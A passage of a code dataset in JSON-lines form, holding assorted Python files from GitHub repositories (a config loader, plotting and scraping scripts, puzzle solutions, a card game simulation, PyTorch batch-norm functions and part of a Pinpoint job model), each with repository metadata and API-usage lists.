"line_number": 166, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 173, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 174, "usage_type": "call"}, {"api_name": 
"django.views.decorators.csrf.csrf_exempt", "line_number": 174, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Client.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 180, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 188, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 189, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 194, "usage_type": "name"}, {"api_name": "models.Saldo.objects.all", "line_number": 196, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 196, "usage_type": "name"}, {"api_name": "models.Client.objects.all", "line_number": 198, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 198, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "40058429586", "text": "import os\nimport yaml\n\n\nclass Config(object):\n configs = {}\n\n def __init__(self):\n config_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"config\")\n for item in os.listdir(config_path):\n config_file = os.path.join(config_path, item)\n config_key = item.removesuffix(\".yaml\")\n with open(config_file, mode=\"r\", encoding=\"utf-8\") as f:\n self.configs[config_key] = yaml.load(f.read(), Loader=yaml.FullLoader)\n\n @classmethod\n def get_wx_path(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"wx_path\")\n\n @classmethod\n def boot_waiting_sec(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"boot_waiting_sec\")\n\n @classmethod\n def qrcode_refresh_waiting_sec(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"qrcode_refresh_sec\")\n\n @classmethod\n def get_app_port(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"server.port\")\n", "repo_name": "woody3/flask_demo", "sub_path": "utils/configUtils.py", "file_name": "configUtils.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "30042526541", "text": "import plotly.offline as pyo\nimport plotly.graph_objs as go\nimport pandas as pd\n\ndf = pd.read_csv(\"data/2018WinterOlympics.csv\")\ntrace1 = go.Bar(x = df[\"Name of Counry\"],\n y = df[\"Gold\"],\n name = \"gold medals\",\n marker = {\"color\" :\"#FFD700\"})\n \ntrace2 = go.Bar(x = df[\"NOC\"],\n y = df[\"Silver\"],\n name = \"silver-medals\",\n marker=dict(color = \"#B2B9AE\"))\n\ntrace3 = go.Bar(x = df[\"NOC\"],\n 
y = df[\"Bronze\"],\n name = \"bronze medals\",\n marker={\"color\" : \"#8F6409\"})\n\ndata = [trace1,trace2,trace3]\n\nlayout = go.Layout(title = \"Medal Count By Country Name\",\n title_x = 0.5, barmode=\"stack\")\n\nfig = go.Figure(data = data, layout = layout)\npyo.plot(fig,filename=\"bar_chart.html\")", "repo_name": "deveshraichandani/dash", "sub_path": "bar.py", "file_name": "bar.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 6, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 6, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 11, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 11, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 16, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 16, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 23, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 26, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 26, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "19801494704", "text": "from typing import Protocol\n\nfrom patterns.repository import BaseRepository, IFindRepository\nfrom models import Occurrence, Vehicle\nfrom .occurrence_find import (\n OccurrenceFindRepository,\n OccurrenceFindRepositoryParams,\n)\n\n\nclass OccurrenceUpdateRepositoryParams(Protocol):\n occurrence_uuid: str\n vehicle: Vehicle\n description: str\n address_state: str\n address_city: str\n address_district: str\n address_street: str\n address_number: str\n\n\nclass OccurrenceUpdateRepository(BaseRepository):\n def update(self, params: OccurrenceUpdateRepositoryParams) -> None:\n getting_repository: IFindRepository[\n OccurrenceFindRepositoryParams, Occurrence\n ] = OccurrenceFindRepository(self.session)\n\n occurrence: Occurrence = getting_repository.find_one(params)\n\n occurrence.id_veiculo = params.vehicle.id\n occurrence.descricao = params.description\n occurrence.endereco_uf = params.address_state\n occurrence.endereco_cidade = params.address_city\n occurrence.endereco_bairro = params.address_district\n occurrence.endereco_logragouro = params.address_street\n occurrence.endereco_numero = params.address_number\n\n self.session.add(occurrence)\n", "repo_name": "VictorHenrich/projeto-seguranca-transito-backend", "sub_path": "src/repositories/occurrence/occurrence_update.py", "file_name": "occurrence_update.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Protocol", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Vehicle", "line_number": 13, "usage_type": "name"}, {"api_name": "patterns.repository.BaseRepository", "line_number": 22, "usage_type": "name"}, {"api_name": "patterns.repository.IFindRepository", "line_number": 24, "usage_type": "name"}, {"api_name": "occurrence_find.OccurrenceFindRepositoryParams", "line_number": 25, "usage_type": "name"}, {"api_name": 
"models.Occurrence", "line_number": 25, "usage_type": "name"}, {"api_name": "occurrence_find.OccurrenceFindRepository", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Occurrence", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "43866544052", "text": "from utils.classes.user import User\nfrom utils.classes.card import Card\n\nif __name__ == '__main__':\n try:\n while 1:\n \n user =User() \n card = Card()\n userInfo={}\n userInfo[\"user_name\"] = input(\"Write o user full name: \")\n userInfo[\"user_nickname\"] = input(\"Write nickname: \")\n userInfo[\"user_gender\"] = input(\"Write gender: \")\n \n while 1:\n try:\n #se nao for inteiro, vai gerar erro\n userInfo['card_id_fk'] = int( input(\"Write id card : \"))\n \n #transforma em string para ser analisado\n userInfo['card_id_fk']= str(userInfo['card_id_fk']) \n\n if not card.verify(userInfo['card_id_fk']):\n print(\"\\nCard not registered\\n\")\n \n else:\n\n if not card.verify(userInfo['card_id_fk']):\n print(\"\\nCard not registered\\n\")\n\n else: \n cardUser =(card.verifyUse(userInfo['card_id_fk']))\n\n if cardUser:\n print(\"\\nthis card is owned by \",cardUser,\". Please, write another\\n\")\n\n else:\n\n break\n except ValueError:\n print(\"\\n\\nplease, put a integer number\")\n\n \n if not userInfo[\"user_nickname\"]:\n userInfo[\"user_nickname\"] = None\n if not userInfo[\"user_gender\"]:\n userInfo[\"user_gender\"] = None\n if not userInfo[\"card_id_fk\"]:\n userInfo[\"card_id_fk\"] = None \n\n user.register(userInfo)\n print(\"User registered successfully\")\n input(\"press \\'enter\\' to register a new user\")\n\n except KeyboardInterrupt:\n print(\"\\n\\nExecution ended by user\")\n\n", "repo_name": "Batista-Gabriel/Rfid-Security-System", "sub_path": "Python/userCreation.py", "file_name": "userCreation.py", "file_ext": "py", "file_size_in_byte": 2008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.classes.user.User", "line_number": 8, "usage_type": "call"}, {"api_name": "utils.classes.card.Card", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "70282961766", "text": "# faq.py \n# twizzley \n\nfrom base import Handler\nfrom model import SellModel, FeedbackModel\nfrom google.appengine.api import memcache\nfrom helper import emailme\nfrom ancestor import *\n\n\nclass FAQ(Handler):\n def get(self):\n count = memcache.get(\"TOTAL_TRANSACTED\")\n\n if count is None:\n count = 0\n\n sells = SellModel.all().ancestor(sell_key())\n for item in sells:\n count += int(item.amount)\n\n memcache.set(\"TOTAL_TRANSACTED\", count)\n\n self.render(\"faq.html\", count=count)\n\n\nclass Feedback(Handler):\n def post(self):\n feedback = self.request.get('feedback')\n FeedbackModel(parent=feedback_key(), feedback=feedback).put()\n emailme(feedback)", "repo_name": "lynhan/trademealpoints", "sub_path": "python/faq.py", "file_name": "faq.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base.Handler", "line_number": 11, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 13, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 13, "usage_type": "name"}, {"api_name": "model.SellModel.all", "line_number": 18, "usage_type": "call"}, {"api_name": "model.SellModel", "line_number": 18, "usage_type": "name"}, {"api_name": 
"google.appengine.api.memcache.set", "line_number": 22, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 22, "usage_type": "name"}, {"api_name": "base.Handler", "line_number": 27, "usage_type": "name"}, {"api_name": "model.FeedbackModel", "line_number": 30, "usage_type": "call"}, {"api_name": "helper.emailme", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "23686102354", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport sqlite3\n\n\nURL = 'https://us.ucoin.net/catalog/?country=ussr'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36', 'accept':'*/*'}\n\ndef get_html(url, params = None):\n r = requests.get(url, headers = HEADERS, params = params)\n return r\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('table')\n with sqlite3.connect('coins.db') as db:\n cursor = db.cursor()\n cursor.execute(\"CREATE TABLE IF NOT EXISTS query (title TEXT, discriptions TEXT, image1 TEXT, image2 TEXT\"\n \"image3 TEXT, image4 TEXT, image5 TEXT, image6 TEXT, image7 TEXT, image8 TEXT, image9 TEXT\"\n \"image10 TEXT, image11 TEXT, image12 TEXT, image13 TEXT, image14 TEXT, image15 TEXT, image16 TEXT)\")\n for item in items:\n img2 = item.find('img').get('src')\n img2 = img2.replace('-1c', '-2c')\n disC = item.find('td', class_='mgray-11').get_text(strip=True)\n disC = disC.replace('\\xa0ø\\xa0', ' ')\n disC = disC.replace('Y#', ', ')\n titleC = item.find('tr', class_='marked-0').get_text(strip=True)\n image1C = item.find('img').get('src')\n image2C = img2\n\n nou = '-'\n\n cursor.execute(\"INSERT INTO query VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", (titleC, disC, image1C, image2C, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou) )\n db.commit()\n\n\ndef parse():\n html = get_html(URL)\n if html.status_code == 200:\n get_content(html.text)\n pass\n else:\n print('ERROR')\nparse()\n", "repo_name": "KyklyMachine/Coins-mint", "sub_path": "Parser/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1782, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "18091324688", "text": "from itertools import combinations_with_replacement\n\n\ndef stones(n, a, b):\n scenarios = list(combinations_with_replacement([a, b], n))\n results = list()\n last_stone = 0\n for scenario in scenarios:\n for step in range(1, len(scenario)):\n last_stone += scenario[step]\n results.append(last_stone)\n last_stone = 0\n result = []\n boo = [result.append(num) for num in results if num not in result]\n return sorted(result)\n\n\nprint(stones(4, 10, 100))\n", "repo_name": "faramarz-hosseini/hackerrank-problems", "sub_path": "Manasa and Stones.py", "file_name": "Manasa and Stones.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations_with_replacement", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "36125418244", "text": "#!/usr/bin/env python\n\nfrom collections import defaultdict\nfrom functools import reduce\n\nTEST_INPUT = 
defaultdict(list, {\n 'c': ['a', 'f'],\n 'a': ['b', 'd'],\n 'b': ['e'],\n 'd': ['e'],\n 'f': ['e'],\n})\n\n\nREAL_INPUT = defaultdict(list, {\n 'Z': ['V', 'H', 'L', 'E', 'D', 'Y'],\n 'V': ['K', 'S', 'P'],\n 'M': ['Q', 'B', 'I', 'N', 'D', 'A', 'O', 'G'],\n 'E': ['X', 'H', 'W'],\n 'J': ['W', 'I', 'R', 'C', 'A', 'N', 'S'],\n 'L': ['O', 'W', 'T', 'X'],\n 'Q': ['T', 'S', 'G'],\n 'Y': ['P', 'X', 'C', 'D'],\n 'X': ['R', 'T', 'A', 'F', 'S'],\n 'T': ['U', 'H', 'C', 'I', 'R', 'S', 'P'],\n 'I': ['O', 'G', 'S', 'P', 'F'],\n 'P': ['H', 'N', 'R', 'W'],\n 'G': ['A', 'R', 'N', 'S', 'F'],\n 'N': ['A', 'R', 'W', 'O', 'K'],\n 'H': ['B', 'C', 'F', 'S'],\n 'F': ['D', 'A', 'C', 'W'],\n 'S': ['O', 'K', 'B'],\n 'O': ['W', 'B', 'A', 'D'],\n 'D': ['U', 'K', 'R', 'B', 'W'],\n 'W': ['B', 'C'],\n 'A': ['K', 'U', 'B'],\n 'B': ['R', 'C'],\n 'K': ['C', 'U'],\n 'R': ['C', 'U'],\n 'U': ['C'],\n})\n\ndef parse_instructions(instructions):\n input_list = defaultdict(list)\n with open(instructions, 'r') as rules:\n for rule in rules:\n r = rule.split()\n input_list[r[1]].append(r[7])\n return input_list\n\ndef find_start_points(input_list):\n start_points = []\n for i in list(input_list.keys()):\n s = list(map(lambda x: i in x, list(input_list.values())))\n r = reduce((lambda x, y: x or y), s)\n if not r:\n start_points.append(i)\n start_points.sort()\n return start_points\n\ndef has_no_deps(node, graph):\n collapsed = reduce(lambda x,y: x+y, list(graph.values()), [])\n if node not in reduce(lambda x,y: x+y, list(graph.values()), []):\n return True\n return False\n\ndef traverse_graph(start_points, graph):\n start_point = start_points.pop(0)\n path = [start_point]\n next_points = start_points\n next_points += graph.pop(start_point, [])\n while next_points:\n next_points = list(filter(lambda x: has_no_deps(x, graph), next_points))\n next_points.sort()\n if next_points:\n p = next_points.pop(0)\n path.append(p)\n n = graph.pop(p, [])\n if n:\n next_points += n\n sps = find_start_points(graph)\n if sps:\n next_points = list(set(next_points + sps))\n return path\n\ndef main(input_list):\n start_points = find_start_points(input_list)\n if start_points:\n path = traverse_graph(start_points, input_list)\n print('Path = ', ''.join(path))\n\nif __name__ == '__main__':\n instructions = 'input.dat'\n input_list = parse_instructions(instructions)\n main(TEST_INPUT)\n main(input_list)\n", "repo_name": "manishlad/adventofcode", "sub_path": "2018/07/sum_of_parts.py", "file_name": "sum_of_parts.py", "file_ext": "py", "file_size_in_byte": 2732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 44, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 55, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 62, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "37342546404", "text": "#!/usr/bin/env python\n\n\"\"\"\n\nUtilities to find IPv4/IPv6 prefixes that are \"colocated\", in the sense\nthat they are likely routed to the same physical location.\n\n\"\"\"\n\nimport json\nimport sys\n\ndef prefixes_from_asn(probes_file, asn):\n \"\"\"Given an ASN, returns a list of (IPv4 prefix, IPv6 prefix) of colocated\n prefixes originated from this ASN. 
It uses Atlas probes.\"\"\"\n probes = json.load(probes_file)\n interesting_probes = [probe for probe in probes['objects'] if probe['asn_v4'] == asn and probe['asn_v4'] == probe['asn_v6']]\n return set((probe['prefix_v4'], probe['prefix_v6']) for probe in interesting_probes)\n\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as probe_file:\n for pair in prefixes_from_asn(probe_file, int(sys.argv[2])):\n print(\"{}\\t{}\".format(pair[0], pair[1]))\n", "repo_name": "vgiotsas/ipv6-route-optimization", "sub_path": "as_paths/prefixes_from_probe.py", "file_name": "prefixes_from_probe.py", "file_ext": "py", "file_size_in_byte": 821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "18809143120", "text": "from random import shuffle\nfrom queue import Queue\nfrom typing import List\n\n\nclass DrunkerGeneralException(Exception):\n pass\n\n\nclass InvalidCardException(DrunkerGeneralException):\n pass\n\n\nclass PlayerOutOfCardsException(DrunkerGeneralException):\n pass\n\n\nclass Card:\n\n possible_values = ['6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n\n def __init__(self, value):\n if value in self.possible_values:\n self.value = value\n else:\n raise InvalidCardException\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __gt__(self, other):\n if self.value == '6' and other.value == 'A':\n return True\n if self.possible_values.index(self.value) > self.possible_values.index(other.value) and \\\n (self.value != 'A' or other.value != '6'):\n return True\n return False\n\n def __repr__(self):\n return self.value\n\n\nclass Deck:\n\n def __init__(self):\n self.all_deck = []\n for card_type in range(4):\n for one_card in Card.possible_values:\n self.all_deck.append(Card(one_card))\n\n def shuffle(self):\n shuffle(self.all_deck)\n\n\nclass Player:\n\n def __init__(self):\n self.hand = Queue()\n\n def move(self):\n if not self.hand.empty():\n return self.hand.get()\n else:\n raise PlayerOutOfCardsException\n\n def take(self, cards: List[Card]):\n for card in cards:\n self.hand.put(card)\n\n\nclass Game:\n\n def __init__(self, id_=1, write_log=False):\n self.game_id = id_\n self.write_log = write_log\n self.player1 = Player()\n self.player2 = Player()\n deck = Deck()\n deck.shuffle()\n self.deck = deck.all_deck\n self.deal()\n\n def deal(self):\n self.player1.take(self.deck[0:len(self.deck) // 2])\n self.player2.take(self.deck[len(self.deck) // 2:len(self.deck) + 1])\n\n def play(self):\n bank = []\n step = 0\n log_messages = []\n\n while True:\n step += 1\n\n log_messages.append(f\"Step: {step}\")\n log_messages.append(f\"Player1 hand before step {self.player1.hand.queue}\")\n log_messages.append(f\"Player2 hand before step {self.player2.hand.queue}\")\n\n try:\n card1 = self.player1.move()\n log_messages.append(f\"Player1 puts {card1}\")\n except PlayerOutOfCardsException:\n log_messages.append(\"Player1 lost the game\")\n if self.write_log and step <= 19:\n with open(f'log/game_{self.game_id}.txt', 'w') as file_:\n file_.write('\\n'.join(log_messages))\n # print(\"Player 1 has lost the game\")\n # print(f\"Game {self.game_id} finished. 
Steps {step}\")\n                return 2, step, self.game_id\n\n            try:\n                card2 = self.player2.move()\n                log_messages.append(f\"Player2 puts {card2}\")\n            except PlayerOutOfCardsException:\n                log_messages.append(\"Player 2 has lost the game\")\n                if self.write_log and step <= 19:\n                    with open(f'log/game_{self.game_id}.txt', 'w') as file_:\n                        file_.write('\\n'.join(log_messages))\n                # print(f\"Game {self.game_id} finished. Steps {step}\")\n                return 1, step, self.game_id\n\n            bank.append(card1)\n            bank.append(card2)\n\n            shuffle(bank)\n\n            log_messages.append(f\"Bank: {bank}\")\n\n            if card1 > card2:\n                self.player1.take(bank)\n            elif card2 > card1:\n                self.player2.take(bank)\n            elif card1 == card2:\n                log_messages.append('Tie!')\n                continue\n            bank = []\n\n            log_messages.append(f\"Player1 hand after step {self.player1.hand.queue}\")\n            log_messages.append(f\"Player2 hand after step {self.player2.hand.queue}\")\n            log_messages.append(\"-------------------------------------------------\")\n\n\nif __name__ == \"__main__\":\n\n    wins = []\n    steps = []\n    shortest = []\n    for k in range(100000):\n        game = Game(id_=k, write_log=True).play()\n        wins.append(game[0])\n        steps.append(game[1])\n        if game[1] <= 19:\n            shortest.append(game[2])\n\n    print(wins.count(1), wins.count(2), wins.count(3), max(steps), min(steps), sum(steps) / len(steps))\n    print(f\"Short games: {shortest}\")\n", "repo_name": "Andrewkha/drunkman", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.shuffle", "line_number": 52, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 66, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "71241418085", "text": "import torch\nfrom torch.autograd import Variable, Function\nfrom .src import *\n\n__all__ = ['sum_square', 'batchnormtrain']\n\ndef sum_square(input):\n    r\"\"\"Calculate sum of elements and sum of squares for Batch Normalization\"\"\"\n    return _sum_square.apply(input)\n\n\nclass _sum_square(Function):\n    @staticmethod\n    def forward(ctx, input):\n        ctx.save_for_backward(input)\n        if input.is_cuda:\n            xsum, xsqusum = gpu.sumsquare_forward(input)\n        else:\n            xsum, xsqusum = cpu.sumsquare_forward(input)\n        return xsum, xsqusum\n\n    @staticmethod\n    def backward(ctx, gradSum, gradSquare):\n        input, = ctx.saved_variables\n        if input.is_cuda:\n            gradInput = gpu.sumsquare_backward(input, gradSum, gradSquare)\n        else:\n            raise NotImplementedError\n        return gradInput\n\n\nclass _batchnormtrain(Function):\n    @staticmethod\n    def forward(ctx, input, mean, std, gamma, beta):\n        ctx.save_for_backward(input, mean, std, gamma, beta)\n        if input.is_cuda:\n            output = gpu.batchnorm_forward(input, mean, std, gamma, beta)\n        else:\n            output = cpu.batchnorm_forward(input, mean, std, gamma, beta)\n        return output\n\n    @staticmethod\n    def backward(ctx, gradOutput):\n        input, mean, std, gamma, beta = ctx.saved_variables\n        if gradOutput.is_cuda:\n            gradInput, gradMean, gradStd, gradGamma, gradBeta = \\\n                gpu.batchnorm_backward(gradOutput, input, mean,\n                                       std, gamma, beta, True)\n        else:\n            raise NotImplementedError\n        return gradInput, gradMean, gradStd, gradGamma, gradBeta\n\n\ndef batchnormtrain(input, mean, std, gamma, beta):\n    r\"\"\"Applies Batch Normalization over a 3d input that is seen as a\n    mini-batch.\n\n    .. _encoding.batchnormtrain:\n\n    .. 
math::\n\n y = \\frac{x - \\mu[x]}{ \\sqrt{var[x] + \\epsilon}} * \\gamma + \\beta\n\n Shape:\n - Input: :math:`(N, C)` or :math:`(N, C, L)`\n - Output: :math:`(N, C)` or :math:`(N, C, L)` (same shape as input)\n\n \"\"\"\n return _batchnormtrain.apply(input, mean, std, gamma, beta)\n", "repo_name": "ycszen/TorchSeg", "sub_path": "furnace/legacy/sync_bn/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 2141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1396, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.autograd.Function", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.autograd.Function", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "12506534985", "text": "import datetime\nimport os\nimport sys\nimport traceback\nimport uuid\n\nfrom google.appengine.api import datastore_errors\nfrom google.appengine.api import taskqueue\nfrom google.appengine.ext import ndb\nfrom google.appengine.runtime import apiproxy_errors\n\nfrom dashboard.common import utils\nfrom dashboard.pinpoint.models import job_state\nfrom dashboard.pinpoint.models import results2\nfrom dashboard.services import issue_tracker_service\n\n\n# We want this to be fast to minimize overhead while waiting for tasks to\n# finish, but don't want to consume too many resources.\n_TASK_INTERVAL = 60\n\n\n_CRYING_CAT_FACE = u'\\U0001f63f'\n_ROUND_PUSHPIN = u'\\U0001f4cd'\n\n\nOPTION_STATE = 'STATE'\nOPTION_TAGS = 'TAGS'\n\n\nCOMPARISON_MODES = job_state.COMPARISON_MODES\n\n\ndef JobFromId(job_id):\n \"\"\"Get a Job object from its ID. Its ID is just its key as a hex string.\n\n Users of Job should not have to import ndb. This function maintains an\n abstraction layer that separates users from the Datastore details.\n \"\"\"\n job_key = ndb.Key('Job', int(job_id, 16))\n return job_key.get()\n\n\nclass Job(ndb.Model):\n \"\"\"A Pinpoint job.\"\"\"\n\n created = ndb.DateTimeProperty(required=True, auto_now_add=True)\n # Don't use `auto_now` for `updated`. When we do data migration, we need\n # to be able to modify the Job without changing the Job's completion time.\n updated = ndb.DateTimeProperty(required=True, auto_now_add=True)\n\n # The name of the Task Queue task this job is running on. If it's present, the\n # job is running. The task is also None for Task Queue retries.\n task = ndb.StringProperty()\n\n # The string contents of any Exception that was thrown to the top level.\n # If it's present, the job failed.\n exception = ndb.TextProperty()\n\n # Request parameters.\n arguments = ndb.JsonProperty(required=True)\n\n # TODO: The bug id is only used for posting bug comments when a job starts and\n # completes. 
This probably should not be the responsibility of Pinpoint.\n bug_id = ndb.IntegerProperty()\n\n # Email of the job creator.\n user = ndb.StringProperty()\n\n state = ndb.PickleProperty(required=True, compressed=True)\n\n tags = ndb.JsonProperty()\n\n @classmethod\n def New(cls, quests, changes, arguments=None, bug_id=None,\n comparison_mode=None, pin=None, tags=None, user=None):\n \"\"\"Creates a new Job, adds Changes to it, and puts it in the Datstore.\n\n Args:\n quests: An iterable of Quests for the Job to run.\n changes: An iterable of the initial Changes to run on.\n arguments: A dict with the original arguments used to start the Job.\n bug_id: A monorail issue id number to post Job updates to.\n comparison_mode: Either 'functional' or 'performance', which the Job uses\n to figure out whether to perform a functional or performance bisect.\n If None, the Job will not automatically add any Attempts or Changes.\n pin: A Change (Commits + Patch) to apply to every Change in this Job.\n tags: A dict of key-value pairs used to filter the Jobs listings.\n user: The email of the Job creator.\n\n Returns:\n A Job object.\n \"\"\"\n state = job_state.JobState(quests, comparison_mode=comparison_mode, pin=pin)\n job = cls(state=state, arguments=arguments or {},\n bug_id=bug_id, tags=tags, user=user)\n\n for c in changes:\n job.AddChange(c)\n\n job.put()\n return job\n\n @property\n def job_id(self):\n return '%x' % self.key.id()\n\n @property\n def status(self):\n if self.task:\n return 'Running'\n\n if self.exception:\n return 'Failed'\n\n return 'Completed'\n\n @property\n def url(self):\n return 'https://%s/job/%s' % (os.environ['HTTP_HOST'], self.job_id)\n\n def AddChange(self, change):\n self.state.AddChange(change)\n\n def Start(self):\n \"\"\"Starts the Job and updates it in the Datastore.\n\n This method is designed to return fast, so that Job creation is responsive\n to the user. It schedules the Job on the task queue without running\n anything. It also posts a bug comment, and updates the Datastore.\n \"\"\"\n self._Schedule()\n self.put()\n\n title = _ROUND_PUSHPIN + ' Pinpoint job started.'\n comment = '\\n'.join((title, self.url))\n self._PostBugComment(comment, send_email=False)\n\n def _Complete(self):\n try:\n results2.ScheduleResults2Generation(self)\n except taskqueue.Error:\n pass\n\n # Format bug comment.\n\n if not self.state.comparison_mode:\n # There is no comparison metric.\n title = \"%s Job complete. See results below.\" % _ROUND_PUSHPIN\n self._PostBugComment('\\n'.join((title, self.url)))\n return\n\n # There is a comparison metric.\n differences = tuple(self.state.Differences())\n\n if not differences:\n title = \"%s Couldn't reproduce a difference.\" % _ROUND_PUSHPIN\n self._PostBugComment('\\n'.join((title, self.url)))\n return\n\n # Include list of Changes.\n owner = None\n sheriff = None\n cc_list = set()\n commit_details = []\n for _, change in differences:\n if change.patch:\n commit_info = change.patch.AsDict()\n else:\n commit_info = change.last_commit.AsDict()\n\n # TODO: Assign the largest difference, not the last one.\n owner = commit_info['author']\n sheriff = utils.GetSheriffForAutorollCommit(commit_info)\n cc_list.add(commit_info['author'])\n commit_details.append(_FormatCommitForBug(commit_info))\n\n # Header.\n if len(differences) == 1:\n status = 'Found a significant difference after 1 commit.'\n else:\n status = ('Found significant differences after each of %d commits.' 
